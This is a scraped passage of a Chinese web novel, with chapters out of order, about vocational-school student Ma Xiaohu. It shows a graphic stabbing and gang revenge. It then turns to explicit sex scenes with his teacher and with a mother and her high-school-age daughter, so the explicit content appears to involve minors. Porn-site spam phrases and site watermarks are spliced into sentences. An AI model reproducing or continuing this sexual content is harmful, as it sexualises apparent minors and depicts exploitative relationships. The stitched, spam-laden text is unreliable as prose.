他一个人冲进网吧,老黑当时正在打游戏,耗子到跟前时他才发现。刚一站起来,耗子照着老黑的肚子就是一刀。当时网吧里所有人都吓呆了,胆小的女生被吓的捂着眼睛尖叫。耗子捅完第一刀,接着又是一刀。第二刀再一拔出,就见老黑颤颤悠悠的倒在了地上。
据后来在场的人讲,当时耗子两眼血红,目光冰冷。下刀时没有丝毫的犹豫,可以看出,他当时的目的就是捅死老黑。最让在场人心悸的场面是,老黑肚子的血不是流出来的,而是喷出来的。老黑倒下时,他身边已经是一片血红。
肖凯和长毛已经完全吓傻了,但耗子明显没想动他们俩。耗子捅完老黑指着肖凯,“肖胖子,你记得,以后再和小虎做对,哪天躺在地上的就是你……”
耗子说这句话时,声音很平静。而肖凯早已吓得脸色煞白,连连点头,他甚至都有些不敢看耗子。
小胖妞一说完,四眼就埋怨她说,“你怎么不拦着点他啊,或者回来找我们呢?”
小胖妞只是不停的哭,多一句话她也说不出来。马小虎知道,耗子之所以这么做,并不是因为老黑打了他,而是因为老黑动了小胖妞。也的确,作为男人,谁能看着自己的女人受人欺负而无动于衷呢。
马小虎想了半天,掏出手机给耗子打了电话,好半天那面才接了起来,耗子第一句就问,“小虎,老黑死没死?”
马小虎没想到此时耗子的口气居然会这么平静,他回答说,“不知道,说被120拉走了,你在哪儿呢?”
耗子想了下没回答他,而是说,“他不死也得重伤,小虎,我可能得走了,这个电话我也不能再用了,有一个事我想求你……”
耗子并不是不想告诉马小虎他在哪儿,他是怕连累马小虎。马小虎听着他的话,鼻子一酸,轻声说,“你说吧……”
耗子冷静的说,“你帮我照顾照顾我爸妈还有小胖妞,别的就无所谓了……”
马小虎劝说,“耗子,你先别着急,我们再想想办法……”
耗子苦笑下,“还能有什么办法,行了,我不说了,有事情我会联系你……”
说着耗子就挂了电话。
马小虎坐在床上,发了好半天的呆,才抬头看着包知道,“包子,你把话放出去,就说今天所有和耗子这事有关的人,我马小虎一个也不会放过……”
马小虎话音刚落,谢小权接话说,“不行,小虎,你这是胡闹呢。咱们现在就等着看老黑到底死没死,再商量之后怎么办,你现在说这些就是火上浇油……”
周子安也摇摇头,拍了拍马小虎的肩膀,“小虎,小权说的对,先别着急,还不是时候……”
就连平时一听打架肯定第一个同意的大智也觉得不妥,他看着马小虎说,“咱们早晚得收拾他们,不过还是先等等吧……”
马小虎摇了摇头,看着包知道,“就按我说的,今天都谁动了耗子,你把名单给我……”
包知道看了周子安一眼,无奈的点了点头。
马小虎站了起来,看着几人,“你们以前不都劝我当老大吗?我一直不同意,但我今天同意了,我要当老大,当职高的老大,当个我兄弟永远不会被人欺负的老大……”
马小虎说完,几人互相看了看,都点了点头。
这几天唯一让马小虎几人欣慰的消息就是老黑没死,但是重伤。耗子的一刀让他大小肠贯穿,另一刀伤到了脾,听说做了手术,脾已经摘除了。
警察也到学校调查了,和耗子相关的人都被问了话。马小虎也没例外,但最终也没得到什么有用的信息。
校园里开始盛传马小虎要报复的消息,连林琳都过来问马小虎是不是真要这么做。马小虎回答她一个字,“是”那天打耗子的几个人这几天都没来学校。最主要的原因就是害怕,他们不知道马小虎这帮人会做出什么。在外面混的都明白一个道理,软的怕横的,横的怕硬的,硬的怕不要命的。
耗子在马小虎这几人当中,属于是不起眼的。但他都敢出手捅人,还刀刀致命。那另外几个呢?谁也不知道他们会做出什么。
但还是有一个人来上学了,他其实也不是来上课,他就是想到学校拿点东西。他还特意选在早晨来的学校,结果还是被四眼看见了。四眼忙跑回班级告诉马小虎。马小虎二话没说,直接起身直奔高二。

第一百八十八章 主动用嘴
马小虎谁也没叫,他就打算自己去。但杨达壮、四眼还有包知道都紧紧跟在他身后。
到老黑班时,正是下课,班级里闹哄哄的。马小虎四人直接进了班级,整个班级忽然安静下来。都瞪着眼睛看着这几位不速之客。
老黑的小弟一见马小虎进来,立刻呆在那里,脸色像土灰一般。马小虎冲他摆了摆手,“你,出来!”
他站着没动,也不知道是不敢还是什么。马小虎见他不动,直接进了班级,一步步朝他走过去。
四眼的手一直在兜里,他警惕的看着四周,谁要先冲过来,他就准备先来一刀再说。他也想了,绝不会像耗子那么傻,往要害部位捅。他就准备朝大腿屁股或者小肚子一类的地方,即使来上两刀,也没什么大事。
马小虎一到老黑小弟的身边,刚伸手要把他拽出班级。就听身后传来一个女声,“马小虎,你住手……”
马小虎回头一看,就见秦默站在身后,她一头黑发随意的用手帕扎在脑后,素雅的着装,脸上不施粉黛。
马小虎已经好久没见到秦默了,他呆呆的看着这个当年的梦中女神,手不由的放下了。马小虎这才想起来,秦默和老黑是一个班的。
秦默的眼神很清澈,她看着马小虎微微牵动下嘴角,“小虎,你们为什么还要打架呢?这么打来打去的什么时候是个头啊?老黑还躺在医院,你朋友是不是也没了消息?”
马小虎一时语塞,不知道该说什么。秦默继续说,“别再打架了,回班好好学习吧……”
马小虎一句话也没说,只是“嗯”了一声,点点头出了班级。
包知道在后面轻声对四眼说,“看见没,要想说服小虎,不用别的,就找个美女就行。这看见美女话都不会说了……”
四眼捏着嗓子,学秦默的声音,“小虎,乖,别打架了,好好学习啊……”
马小虎被他两人逗的一下笑了,回头骂了一句,“滚。”
耗子的事情韩梅也知道了。她见马小虎这几天心情都不是太好,就特意做了他爱吃的菜,晚上把他叫到家里。
吃饭时,韩梅问说,“耗子还没消息呢?”
马小虎摇摇头,“没有,也不知道他跑哪去了……”
韩梅给马小虎夹了一块排骨,“多吃点儿,这几天脸色都不好……”
马小虎虽然心情不太好,但他顽劣的天性始终没法改。他嬉皮笑脸的说,“脸色不好不也都是因为和你纵欲过度吗?”
韩梅瞪了他一眼,“说不定和谁纵欲呢,从上次吃完火锅你就没来过……”
韩梅一提火锅,马小虎一下想到了丁雅婷,他忙对韩梅说,“要不你问问那个女警察,像耗子这样的事情最好怎么办,要是抓住能判几年?”
韩梅点头答应,“我明天就去找她,要不你和我一起去吧?”
马小虎点点头,韩梅又补充说,“小虎,以后别打架了,你们再闹下去就该出人命了……”
马小虎嘿嘿一笑,转了话题说,“我发现你越来越像我妈了,对我好的时候比谁都好,不好的时候上来就动手……”
韩梅呵呵笑说,“你不惹我我就不打你……”
吃过饭,马小虎冲了澡。两人就躺在床上搂着聊天。马小虎见韩梅掰着手指好像算着什么,就问她干什么呢。
韩梅冲他温柔的笑下,“我算时间呢,我大你五岁,你大学毕业我正好二十九……”
马小虎有些奇怪的问,“大学毕业?我根本就没打算上大学。再说你二十九怎么了?”
韩梅在他身上拍了下,白了他一眼,看着他说,“结婚啊,你和我在一起不想结婚?”
马小虎点点头,“你说的也对,是得结婚,也不能白睡了这么长时间……”
韩梅一听就翻身趴在床上,两个小腿翘着,脚丫在空中乱蹬着,“对啊,睡完我你想跑那可不行……”
马小虎在她脸上掐了下,“我可没想跑,你那小妹妹可是名器,我怎么能舍得跑呢……”
谁知韩梅听了这话,竟叹了口气。她把脸贴在马小虎的小腹上,把坚硬从里面掏了出来。用手轻轻握住,呆呆的看着,一脸哀怨的说,“什么名器也有人老珠黄的那一天,我大你这么多,我真害怕……”
马小虎摸着韩梅的头发,安慰说,“没事,你一百年后还这样……”
韩梅明知道是假话,还是挺开心。她看着马小虎晶亮的头部说,“小虎,我想和你说件事……”
马小虎问说,“什么事?”
韩梅犹豫了半天才说,“我想和你说的是,在咱们俩结婚之前我允许你再和一个女孩儿交往,你们做什么我不管,但一不许怀孕,二不许告诉我……”
马小虎根本不信她的话。他摇头撒谎说,“不用,有你一个就够了……”
韩梅继续说,“我说的是真的,这样对你也公平。我觉得马心语就不错,你和我说实话,那天早上你们两个人在寝室是不是上床了?”
马小虎连忙否认说,“没有,绝对没有,寝室那么多人怎么可能呢……”
韩梅轻轻套弄着坚硬,撇着嘴说,“还骗我,我都打听过了,他们几个是后来才回去的……”
马小虎就打定一个主意,打死不承认。韩梅见他不承认,也不逼问。她把脸凑到马小虎的胯间,轻轻贴在了坚硬上,柔声说,“我帮你亲亲吧?”
马小虎吓的哆嗦一下,他之前求她好几次她都不肯。可今天提完马心语居然要帮自己亲。马小虎怕她咬自己,忙说,“不用亲,你不喜欢还亲什么……”
谁知马小虎说完,韩梅竟张开嘴慢慢含住。脑袋一点点向下探去。虽然动作还很生涩,但还是有一种不一样的快感。 03-28
第一百八十二章 母女同室(二)
马小虎这一叫,房间里的闻文也听到了,她忙在房间里问,“小虎,你怎么了?”
马小虎忙把裤子拽上。李雪也吓的忙大声说,“没事,他踢茶几上了,你写作业吧……”
李雪说完狠狠瞪了马小虎一眼。马小虎系好裤子,靠在李雪身边问说,“我去先把闻文哄睡了吧……”
李雪忙皱着眉头摇摇头,“不行,咱们都说好了的,她上大学前你不许骚扰她……”
马小虎一手放到李雪的乳房上,用力揉着。李雪也不躲,但还是不同意。马小虎一脸坏笑的解释说,“闻文她也想呢,就这样她也学不进去啊……”
马小虎一边说着,一边用力的在李雪的乳房上揉搓着。李雪不由的哼了一声。
她一下把马小虎的手打掉,瞪了他一眼,“你看电视吧,我睡觉去了……”
说着转身回了房间。李雪也实在没有办法了,知道靠自己硬监视着根本也没用。两人说不定什么时候就偷摸搞到一起了。她也不想痛快就答应了,唯一的办法就是选择沉默。乡土尛说網手打马小虎见李雪一回房间,他就溜到闻文的屋里。闻文见他进来,冲他甜蜜一笑,“不看电视啦?”
马小虎上前横腰把闻文抱起,放到床上。闻文吓的忙低声说,“不行啊,我妈在外面呢……”
马小虎嘿嘿一笑,“没事儿,她睡觉了……”
闻文虽然想,但心里还是害怕。马小虎一趴到她身上,她就紧张的说,“不行,万一她进来呢……”
马小虎两手把闻文睡衣掀了起来,就要往下脱,嘴里说,“放心吧,肯定不会来的……”
闻文还是害怕,她商量说,“衣服还是别脱了……”
马小虎一想也行,他就把白色的小内裤拽了下来。闻文紧张的喘息着,心里既担心又期待。
马小虎几下就把自己脱的溜光,闻文吓的赶紧扯过被子说,“你快进被窝,这要是被我妈看到,她得杀了我……”
马小虎却不肯,他跪在闻文的身边,来亲亲。闻文虽然紧张的要命,但一看到她朝思暮想的坚硬,还是毫不犹豫的亲了上去。闻文并不喜欢用嘴,但她知道,马小虎喜欢,她也就顺着他的意思。
闻文的口技很普通,就是正常含着,偶尔会用舌头舔舔。但马小虎却觉得十分刺激,主要是刚才李雪在客厅帮自己舔过,现在闻文又舔,心里的满足感自是无以言表。
马小虎一边低头看着,一边把手伸到闻文的花瓣间,在粉嫩的花瓣上轻轻揉着。闻文嘴里含着坚硬,嗓间低声闷哼几下。这种紧张感和花瓣间的刺激让她感觉有些窒息,她忙把坚硬吐出,大口的喘着粗气。
李雪躺在被窝里,她闭着眼睛,可是没有一点睡意。她虽然听不见,但也知道马小虎和闻文此时正在做什么。一时间心里七上八下、乱七八糟的。
李雪安慰自己,女孩子早晚都会有这一天的。马小虎虽然混蛋点儿,但人也不错。他要是真和闻文成了,也能说的过去。只是自己和他这种关系以后却不知该如何相处。
李雪脑子里胡乱的想着,一想到此时马小虎的坚硬正在女儿的身体里进出,她不由的紧紧并起双腿。一只手用力的揉着自己的乳房,抿着嘴,鼻孔里发出一阵轻哼。
她把手伸到内裤里,用手指在花瓣上快速的来回抚摸着。她忽然绷直大腿,一根手指慢慢插到自己的花瓣中,嘴里发出颤抖的呻吟。眼前全是马小虎的影子,还有他那粗长的坚硬。
李雪的手指在花瓣间快速的动着,但她感觉还是有些空虚,慢慢的又伸进了一根。在里面慢慢寻找肉粒,来回的揉摸着。
闻文把坚硬从嘴里吐出,满脸绯红的看着马小虎,“小虎,快来吧,我害怕……”
马小虎就扛起闻文的双腿,一手扶着坚硬,对准花心,他看着身下的闻文,“我要进来了?”
闻文忙说,“等一下……”
就见她把被子拽到身前,她怕自己一会儿忍不住,就咬住被子的一角,娇羞的冲马小虎点点头,“进来吧……”
马小虎挺着屁股猛的就往里一插,闻文还是没忍住,她紧要着被角哼了一声,她意识到自己发出了声音,忙又把嘴紧紧闭上。
马小虎继续用力,坚硬就齐根没入。闻文虽然感觉有些疼,但她还是咬牙忍住了,更何况酥麻的感觉已经完全超过了疼的感觉。
马小虎开始慢慢抽动着,他低头看着自己的坚硬在花瓣之间来回进出。闻文粉嫩的花瓣一开一合。盛开时整个花心翻向外,里面沾满爱液的肉壁都会跟着露出来。
马小虎越动越快,闻文的呻吟声也越来越急,但她还是咬着被角拼命的忍着,两条玉腿在马小虎的肩上来回蹭着。
马小虎也想速战速决,他心里还惦记着那房间的李雪。他一边动一边用手在闻文的乳房上揉着,低声问说,“闻文,你说你妈能不能听见?”
闻文闭着眼睛摇摇头。
马小虎一边揉着乳房一边说,“为什么你妈的胸比你大这么多?”
闻文把被角拿出,喘着粗气说,“你怎么烦人呢?”
马小虎就用力动了两下,闻文忙又把嘴紧紧闭上。马小虎看着闻文,“快,叫爸爸……”
闻文嗯了下,低声喊说,“老公爸爸……”
马小虎边动边说,“爸爸想去摸你妈妈的大乳房,行不行?”
闻文用腿在他脑袋上踢了下,喘着粗气断断续续的说,“你去吧……看她不,打死你的……”
马小虎心里暗想,她还打死我,说不定现在都急死了呢。马小虎开始加快抽插速度,一下一下的朝花心深处顶去。

第一百八十三章 母女同室(三)
闻文闭着眼睛,双腮粉红,鼻尖上有一层薄薄的汗珠,鼻孔里不时发出低声的闷哼,一头长发散落在床上。乡土尛说網手打她忽然感觉下身有些痉挛,两条玉腿不由的在马小虎的肩上抻直。脚趾用力的朝脚掌回缩着,嗓眼里发出一声哼叫。但她还是用残存的理智咬紧被角,怕自己忍不住喊了出来。
马小虎看着身下闻文的媚态,知道她这是要来了,忙快速抽送着,忽然感觉坚硬被一股热流冲击下,马小虎险些没控制住,差点也射了出来。
闻文瘫软在床上,媚眼如丝的看着马小虎,小嘴微微张着,“你还没出来呢吧?”
马小虎点点头。闻文就催促说,“那快点吧,我还是有点害怕……”
马小虎动了几下,见闻文始终是紧张兮兮的。他就把坚硬拔出,闻文以为他要换姿势,正等着他摆布呢。谁知马小虎躺在她的身边,“我不用出来了,今天就是让你满足……”
闻文在他额头上亲下,“那你不难受吗?”
马小虎嘿嘿一笑,一手在闻文的乳房上摸着,“我没事儿,但我还想去摸你妈的大胸。”
闻文只当他是闹着玩,也没当回事,“我妈的是比我大不少,不过她都多大岁数了,我才多大啊,以后还会长呢,现在是不是就比以前大不少……”
闻文说着自己也低头看。马小虎点点头,“是大了不少……”
闻文坐了起来,开始整理自己的下身。她拿纸巾想帮马小虎擦,马小虎却躲开说不用。闻文有点奇怪的看着他,他嘿嘿笑说,“我就带着你的液体睡觉,这样睡的香……”
闻文哪知道他脑子里想的说什么,皱着眉头说,“我真搞不懂你整天想的是什么……”
马小虎也坐起来,但他只把内裤穿好。闻文看着他说,“你回去睡觉吧?明天我妈要是不在家,我帮你弄出来好不好?”
马小虎点点头,问说,“你还学习?”
闻文摇摇头,“不了,我累了,现在就睡。”
马小虎就等她这句话呢,他拿着衣裤在闻文脸上亲了下,就蹑手蹑脚的去了客卧。
挺了一会儿,他偷偷把门打开,见闻文的房间关灯了。他小心翼翼的出来,偷偷的进了李雪的房间。
闻文好像也听到了李雪房门开了下,她甚至怀疑可能是马小虎真去了妈妈的房间。但她又觉得不太可能,就闭着眼睛继续睡觉。
李雪的房间床头灯还开着,昏黄的灯光下,李雪正蜷着身子侧躺着。她其实没睡着,马小虎进来她听的清清楚楚。
马小虎悄悄的爬上床,一抬头就看见床头上挂着李雪和闻成钢的结婚照。照片中,闻成钢正一脸微笑的看着他。马小虎对着照片嘿嘿一乐,钻进了被窝,从后面搂住李雪。
李雪内心狂跳,暗想自己这是怎么了。他刚和自己女儿做完,现在又上了自己的床,自己却一点都不觉得羞耻。
马小虎用坚硬在李雪的屁股上顶了两下,手伸到前面在她硕大的乳房上捏了捏。他摸李雪的乳房时就敢用力,李雪也从来不说疼。但闻文就不行,他只要力气大点,她就嚷着疼。马小虎就想,这可能是跟大小有关吧。
李雪些奇怪,马小虎刚和女儿做完,怎么这么快又硬了呢?
马小虎见李雪不动,就把她身子扳正。李雪这才睁开眼睛看着马小虎,轻声说,“干什么,还没够啊?”
马小虎嘿嘿笑着,“这么舒服的事儿哪能有够呢……”
说着他就去脱李雪的睡衣,李雪在他手上打了下,瞪他一眼,“我自己来……”
说着把睡衣脱了,内裤也直接脱掉。还帮着马小虎也脱了内裤。马小虎跪在李雪的脑袋前面,把坚硬凑过去,嘟囔说,“来,亲亲……”
熟妇和女孩儿的区别就在这儿,熟妇会觉得在床上一切都是正常的。但女孩儿没接触过的东西,一般都会有些害羞和推搡。
坚硬一到嘴边,李雪毫不犹豫的就拿起含住,她感觉嘴里有些发咸,就猜到是怎么回事了。她在马小虎的屁股上掐了下,吐出坚硬问说,“刚才是不是没擦……”
马小虎坏笑,也不说话。拿着坚硬在李雪嘴唇上杵着。李雪瞪了他一眼,还是把坚硬含在嘴里,开始用力吞吐。
好一会儿,李雪才把坚硬拿出来,她把腿劈开说,“快点上来吧……”
马小虎就趴了上去,两手支在李雪的身体两侧。李雪主动扶着坚硬对准自己的花瓣。马小虎挺着屁股,滋溜一下,坚硬就滑入李雪的花心中。
马小虎一边动一边轻声问说,“刚才我和闻文在那屋做,你能听见吗?”
李雪喘息着说,“听不见……”
马小虎用力挺动几下才说,“闻文是故意憋着的,咬被子才没出声的……”
李雪呻吟两声,忽然担心的问说,“你刚才没射她里面吧?可千万做好避孕啊……”
马小虎也喘着粗气说,“嗯,我根本就没射,都给你留着呢……”
李雪这才放心,但她还是忍不住问说,“闻文来了吗?”
马小虎自豪的说,“我的小弟弟这么厉害,怎么能不让她来高潮呢……”
李雪闭着眼睛娇喘着,幻想闻文在马小虎的身下来高潮的情景。她这么一想,就感觉自己的欲望一下强烈很多,不由的抱着马小虎的屁股,用力的朝自己推着。
马小虎一边抽动着,一边抬头看着床头的照片。李雪开始闭着眼睛,一睁眼看到马小虎坏笑的看着照片,心里知道这坏小子再想什么。就在他屁股上拍了下,“看什么呢,媳妇和女儿都让你睡了你还好意思看……”
马小虎嘿嘿一笑,低下头在李雪的嘴上亲吻着,下身依旧一下下的挺动着。
1加载中

第一百八十四章 被迫同意
李雪见马小虎迟迟没有要射的意思,她就轻轻在他屁股上拍了拍,“要不我上来吧……”
马小虎一听就把坚硬退出,躺在床上说,“我还真有点累了,你来吧……”
李雪斜坐在床上,两腿压在屁股底下。她把一头波浪的卷发捋到脑后,底下头含住马小虎的坚硬,用力的上下吞吐几下。
又慢慢起身,扶着坚硬一点点坐了下去。马小虎就盯着自己的坚硬在李雪的两股之间慢慢插入。
整根坚硬都进入时,李雪轻呼了一口气。她两腿放在马小虎的身体两侧,微微蹲起。手摁着马小虎的前胸,撅着屁股一上一下的动着。
马小虎舒服的倒吸冷气,他两手抓着李雪硕大的乳房,嘴里嘟囔说,“太爽了,哪天你教教闻文吧……”
李雪瞪了他一眼,两腿由蹲改跪,身体前推着,用花心中的肉壁挤蹭着坚硬。
马小虎就感觉坚硬圆头被挤压的一阵阵麻酥,他抓着乳房说,“哎呀,太爽了,我要忍不住了……”
李雪两手还放在他的胸前,低声呻吟说,“我也要来了,一起吧……”
马小虎点点头。李雪就抬起屁股上下快速动着,屁股一下下撞击着马小虎的胯部。马小虎忽然感觉头皮一麻,坚硬开始一下下的跳动,圆头也张开了小嘴,一股股精华喷射而出。
李雪感觉花心被一股热浪冲击,她身子一颤,花瓣就开始收缩。两手紧紧攥着马小虎的胳膊,用力的捏着,好半天才发出一声低沉的“哦啊”声。她这是强忍着没让自己喊出来。
好半天,李雪才缓过来,她慢慢的把坚硬退出。拿了几张纸巾开始清理自己的下部,同时低头含住马小虎的下身,用嘴帮他清理。马小虎又指了指大腿根处,原来刚才爱液已经流到了大腿上。李雪没再用嘴,拿着纸巾帮他擦了。
马小虎搂着李雪,李雪的手还放在马小虎的下身,轻声说,“行了,回去睡觉吧……”
马小虎耍赖,想在她房间住,李雪死活不肯,硬是把他撵下了床。
马小虎回到客卧,躺下不一会儿就呼呼大睡。他睡的正香,就感觉有人上了他的床。他第一感觉是李雪,可当一只小手搂过来时,他觉得不对,迷迷糊糊的回头,就见闻文正对他笑呢。闻文是半夜起夜,就想过来看看他。
闻文看着马小虎迷瞪的样子,小声问说,“睡的香吗?”
乡土尛说網手打马小虎实在太困,又闭上眼睛,一条大腿压在闻文身上,手也搂了过去,嘟囔说,“来,爸爸搂你睡……”
闻文呵呵傻笑,一只手伸到马小虎的内裤里摸着他的下身。坚硬早就耷拉着脑袋。
两人腻了一会儿,闻文轻声说,“你睡吧,我就过来看看你。我回去啦……”
闻文刚要下床,卧室门一下开了。吓的她赶紧一下坐了起来。马小虎却没当回事,依旧躺在那,瞪着眼睛看。
李雪根本不知道闻文来客卧了。她也是起夜过来随便看一眼,哪想到闻文正躺床上呢。她把灯打开,看着闻文说,“闻文,你出来,我有话跟你说……”
闻文回头看了马小虎一眼,撅嘴跟着李雪出了房间。李雪虽然知道她和马小虎的事情,但让她撞到了,她自然不能不管。她想正好也趁机教训闻文一番。
李雪看着闻文,厉声说,“你半夜不睡觉去小虎房间干什么?”
闻文从小到大被闻成钢夫妇视为掌上明珠,别说打骂,就是大声训斥都很少见。她今天一听李雪的口气,心里有些接受不了,暗想自己和马小虎的事情早晚都得让家人知道。想到这里,她就撅嘴赌气说,“不干什么,我就看他睡没睡呢……”
李雪见闻文一点悔改的意思都没有,一时生气,声调就提高不少,“你是个女孩儿你知道不知道?女孩子要懂得自重……”
闻文一听“自重”这个词,马上就急了,她犟嘴说,“我怎么不自重了?我就是喜欢他怎么了?我告诉你,我和马小虎早就那什么了……”
李雪被气的脑袋嗡了一下,她没想到闻文居然敢这么和她说。李雪举起手,想上去给她一个耳光,谁知闻文竟把脸朝她凑去,“你打吧,打死我吧……”
李雪看着自己从小宠惯的女儿,还是没舍得下手。但闻文却不依不饶,问说,“你要是不打我可走了,我再也不回来了……”
李雪吓的瞪眼看着她,“你要去哪儿?”
闻文撅着嘴说,“我去吴阿姨家,吴阿姨对我最好了……”
李雪气的浑身直哆嗦,但她知道闻文从小就犟,她还真能干出这事儿来。心想都是被自己和老公给宠坏了。她怕闻文真一生气走了,闻成钢回来她没法交代,就换个态度和她说,“闻文,妈不是不让你和小虎在一起,只是你们现在还小。你要以学习为重,你们的事情怎么也得到大学了再说啊……”
闻文见李雪的态度转变了,她也不想惹李雪生气。就过去拉着李雪的胳膊,哄着李雪说,“妈,我知道,我学习一直也没落下啊,现在还是年级前十啊,我不会因为和小虎在一起耽误学习的……”
李雪无奈的叹了口气,她看着女儿,“今晚你和妈睡,妈有些话和你好好说说……”
母女俩聊了很晚,李雪无非就是从女人的角度告诉女儿,有些事情该怎么办,如何保护自己。闻文虽然觉得李雪有些啰嗦,但见她已经同意自己和小虎来往,也就认真听着了。
闻文一直搂着妈妈的腰,手无意间碰到了李雪的乳房,她忽然噗嗤一笑。李雪有些奇怪的问,“你笑什么?”

第一百八十五章 三个女人
闻文有些不好意思的说,“小虎说你胸大,他一直想摸呢……”
李雪被闻文的话弄的哭笑不得,低头看着闻文,“闻文,你说你这孩子是不是傻啊?”
马小虎没想到闻文居然成功的劝服了李雪。他暗自窃喜,说不定哪天真能和母女同床呢。
这段时间班级同学都特别的忙,都在为元旦联欢会做准备。就连耗子、四眼、包知道和杨达壮都排了个三句半,唯独马小虎无所事事,关键他唱歌跑调,别的更不会什么。如果有骂人打架的节目他倒是能表演一个。
元旦前一天,班级同学就跟打了鸡血一样,班级里闹哄哄的。有排练节目的,有布置班级的。这回马小虎还有点用,他个子高,就帮着挂个气球、扯个条幅之类的。
他刚把最后一个气球挂好,口袋里的手机就响了。拿出一看是韩梅,他就拿着电话出门去接。
韩梅告诉他她同学回来了,几个人准备明天聚会,让他准备一下。马小虎说明天班级联欢。韩梅就说,反正你也没节目,就和老师请个假吧。中午再陪我出去一趟。马小虎问她去干什么,韩梅也没说。
韩梅的做事风格就是要么不做,要么就做好。就拿她和马小虎来说,她虽然不敢公开承认两乘公共汽车第一次没了人的关系,但在她心里,她一直把马小虎当成自己的男友。乡土尛说網手打中午时,韩梅带马小虎去了商场,给他换了一身衣服。去带他去理了发,特意给他往成熟上打扮。
看着马小虎的新造型,韩梅还比较满意,两人又去找了家面馆吃午饭。马小虎哧溜哧溜的大口吃着,韩梅就看着他说,“你小点口,吃饭别出声……”
马小虎不服的说,“吃面条要是不出声的话,就像在床上不让你叫一样,你能受得了啊?”
幸亏马小虎声音不大,旁边没人听见。就是这样韩梅脸也红了,她拿筷子在马小虎手上打了下,“你能不能别胡说?”
马小虎撇着嘴,也不管韩梅,还是和刚才一个吃相。没一会儿,一大碗面条就被他吃光,韩梅碗里还剩一大半呢。
马小虎一边擦嘴,一边问韩梅,“你是不是怕我明天去给你丢人啊?又买衣服又剪头的?”
韩梅倒不是怕他丢人,主要是他另类无码一区二区三区精神帅气自己也有面子。她怕马小虎多想,就撒谎说,“没有,这不是过年了吗?给你换个新造型……”
马小虎盯着韩梅,“那你说咱两在床上是不是也换个新姿势呢?”
马小虎的话让韩梅一口面条险些喷出来,她咬着牙看着马小虎,“你要是再敢胡说,我现在就打你满地找牙……”
马小虎一听韩梅说要动手,忙把嘴闭上。
韩梅慢慢吃着,马小虎就在面馆里左顾右盼的,他忽然看见一个熟悉的身影,忙把头低了下来,但眼睛还溜溜的转着看。
韩梅见他不对,就轻声问他,“怎么了?”
马小虎做了一个嘘声的手势,悄声说,“我看见郑前程他女朋友了……”
韩梅也吓了一跳,她也不想被别人看见。马小虎又神神秘秘的说,“她不是和郑前程在一起,和另外一个男的,还挺亲密呢……”
韩梅也认识赵妍菲,她忙小声说,“咱俩走吧,我可不想看见她……”
说着两人头也不回的走了。
赵妍菲无意间抬头,看着韩梅和马小虎的背影,嘴里自言自语的说,“怎么好像是韩梅呢……”
她对面的男人也回了下头,轻声问,“韩梅是谁啊?”
赵妍菲白了他一眼,“谁你也不认识,快点吃,吃完我还有事呢……”
这男的嘿嘿一笑,脸往前凑说,“我刚才表现还行吧?”
赵妍菲似笑非笑的说,“还凑合吧……”
韩梅初中时最好的两个朋友,一个叫程安妮,另一个叫丁雅婷。但三人上了大学后基本就断了联系。这次程安妮过年回家,费了不少劲联系到她们两,三人约好在一家火锅店见面。
韩梅和马小虎到时,她们两人已经等了一会儿。三个女人一见面自然叽叽喳喳、又搂又抱的。
好不容易安静下来,程安妮看着韩梅身边的马小虎说,“韩梅,你还真领了个小帅哥啊……”
韩梅大大方方的介绍说,“这是我干弟弟,也是我学生……”
程安妮长的很白,但有些胖,长相也很普通。但却很敢说话,她和马小虎握手说,“是干(一声)弟弟还是干(四声)弟弟啊?”
她话音一落,房间里的几人都哈哈大笑。马小虎也是一脸无所谓的跟着傻笑。
韩梅在程安妮身上轻打了下,“你这在外企的就是不一样,什么话都敢说。”
丁雅婷看着马小虎,皱着眉头想想说,“你是不是叫马小虎?”
刚才丁雅婷一直背对着马小虎,马小虎也没看清。她这一问,马小虎仔细一看,一下呆住了,这个丁雅婷就是上次在派出所打他一巴掌的女警。
马小虎张大了嘴,看着丁雅婷,“警察姐姐?”
丁雅婷一听哈哈大笑,她外套已经脱了,只穿着淡蓝色的警用衬衫。这一笑,胸前的丰满也跟着一颤一颤的,她看着韩梅说,“原来这个小混蛋是你干弟弟啊,也怪不得你能认他当弟弟。他油嘴滑舌的,说话才贫呢……”
韩梅楞了下,问说,“你们认识?”
丁雅婷笑笑说,“岂止认识呢……”
说着就把那天在派出所的事情讲了一遍。
韩梅听完就懊悔的说,“我一直以为你在乡镇的派出所呢,哪知道你调回来了,要不就去找你了……”
丁雅婷一双大眼睛忽闪着,“可不是吗?要是知道是你弟弟,他在里面也不能挨打啊……”

第一百八十六章 耗子偷情
几人说着话,程安妮把自己的男友给两人介绍下,是她大学的同学。丁雅婷已经结婚了,丈夫叫罗胜,是市里主抓政法领导的秘书。他带着一副眼镜,看着有些瘦弱,还挺斯文的,但骨子里却有着一种说不出的傲慢。
程安妮特意点了白酒,她说吃川味火锅必须配上白酒才过瘾。她给韩梅和丁雅婷倒上,也不管三个男的喝不喝。端起酒杯就和两人喝上了。
韩梅这是第一次喝白酒,刚喝两口,脸就微微泛红,整个人更显妩媚。程安妮和丁雅婷喝酒却不上脸,但丁雅婷一和她两碰杯时,胸前丰满的乳房就颤几下,马小虎在旁边一直偷看着。
三人聊的无非是上学时候的趣事,外加现在的工作近况。几个男人也插不上嘴,就闷闷的吃着。
刚吃不一会儿,罗胜的手机就响了,他接完对丁雅婷说,“雅婷,我得走了,领导找我有事……”
丁雅婷有些不满,嘟囔说,“一和我出来你就有事……”
但她也知道秘书的时间根本一个人看的免费视频www就不归自己,还是让他走了。
丁雅婷和马小虎之间本来隔着罗胜。罗胜一走,她就把中间的椅子挪走,重新一坐下,脚尖无意当中碰到了马小虎的脚。
丁雅婷没想到,她刚把脚收回去,马小虎居然用脚轻轻回踢了她一下。丁雅婷又轻轻的踢了回去,马小虎竟又踢了回来。
丁雅婷暗想,马小虎这小子油腔滑调的,这是故意在挑逗自己呢。看来他和韩梅的关系绝对不简单。她心里想着,就想让马小虎吃点苦头。她这回不踢马小虎的鞋了,而是照着马小虎的小腿就是一脚。
丁雅婷认准了马小虎不会吭声。实际她根本不了解马小虎,马小虎踢她和调戏无关,他就觉得你碰我一下,我就碰你一下,这样咱们就两不相干。
马小虎小腿上挨了一脚,还挺疼。他马上就不干了,看着丁雅婷问说,“你踢我干什么?”
马小虎这一问,桌上所有人的目光都集中在丁雅婷身上。丁雅婷脸腾的一下红了,忙解释说,“我不是故意的……”
韩梅用奇怪的眼神看着丁雅婷,丁雅婷心里就暗恨马小虎。谁知马小虎还嘟囔说,“还不是故意的,都踢我好几下了……”
丁雅婷一听,恨的她牙根直痒,真想上去给他两个耳光。
